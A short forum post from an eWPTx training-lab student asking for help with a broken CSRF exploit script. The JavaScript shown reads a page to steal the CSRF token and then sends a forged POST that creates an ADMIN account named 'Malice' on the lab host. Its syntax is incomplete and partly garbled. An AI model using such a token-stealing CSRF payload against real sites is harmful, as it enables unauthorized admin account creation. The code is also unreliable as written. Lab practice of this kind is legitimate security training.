eWPTx - CSRF3 Lab

Hi there. I am doing CSRF Lab 3, and do not understand why my script won’t work. It keeps saying I need to add the token, but my script should’ve taken care of that

<script type="text/javascript">

function addUser(token)

     var url ="http://3.csrf.labs/add_user.php";
     var params ="name=Malice&surname=Smith&email=malice3%40hacker.site&role=ADMIN&submit&CSRFToken=" + token;

     var CSRF =new XMLHttpRequest();
     CSRF.open("POST", url, true);
     CSRF.withCredentials = 'true';
     CSRF.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");


// Extract the token 
var XHR =new XMLHttpRequest(); 
XHR.onreadystatechange =function(){ 

	if(XHR.readyState == 4){ 
  		var htmlSource = XHR.responseText; //The source of users.php 

		//Extract the token 
		var parser = new DOMParser().parseFromString(htmlSource, "text/html"); 
		var token = parser.getElementById('CSRFToken').value; 


XHR.open('GET', 'http://3.csrf.labs/users.php', true); 

Please help